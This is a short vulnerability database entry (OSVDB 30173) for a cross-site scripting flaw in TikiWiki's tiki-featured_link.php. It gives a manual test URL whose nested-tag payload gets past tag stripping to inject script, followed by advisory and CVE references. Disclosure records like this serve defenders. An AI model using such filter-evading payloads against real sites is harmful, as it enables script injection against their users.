TikiWiki tiki-featured_link.php url Variable Nested Tag XSS

2006-11-01T08:03:50
ID OSVDB:30173
Type osvdb
Reporter OSVDB
Modified 2006-11-01T08:03:50

Description

Manual Testing Notes

/tiki-featured_link.php?type=f&url=" ></iframe><scr</script>ipt>alert('XSS')</scri</script>pt> <!--

References:

Vendor URL: http://tikiwiki.org/ Secunia Advisory ID:23039 Secunia Advisory ID:22678 Related OSVDB ID: 30172 Other Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200611-11.xml Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-11/0014.html FrSIRT Advisory: ADV-2006-4316 CVE-2006-5703 Bugtraq ID: 20858